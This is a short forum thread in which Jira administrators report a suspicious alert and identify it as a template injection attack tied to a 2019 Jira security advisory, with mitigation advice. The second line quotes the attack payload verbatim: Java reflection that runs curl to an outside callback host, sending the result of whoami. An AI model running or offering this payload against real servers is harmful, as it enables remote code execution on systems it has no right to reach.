I received this alert twice within a 2 hour period. Has anybody else received an error like this?
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://32te8o.ceye.io/`whoami`').waitFor()
I received same alert.I think, code injection attack.Don't connect the 'http://32te8o.ceye.io' url.
Thanks - it does look suspicious. Doesn't look like many other have seen this attack yet?
https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
I think, this problem is same the link.we need a patch the jira-software.
Same attack received on our side
Its a template injection attack, where the freemarker template from contact admin fields are placed unsafely in the email template. So whoever received it, there serves already comprised by executing the exec() function and get a call back to the attacker server. to mitigate thses, disable the contact admin page in your system setting is jira admin and update it if possible
It looks like you're new here. Sign in or register to get started.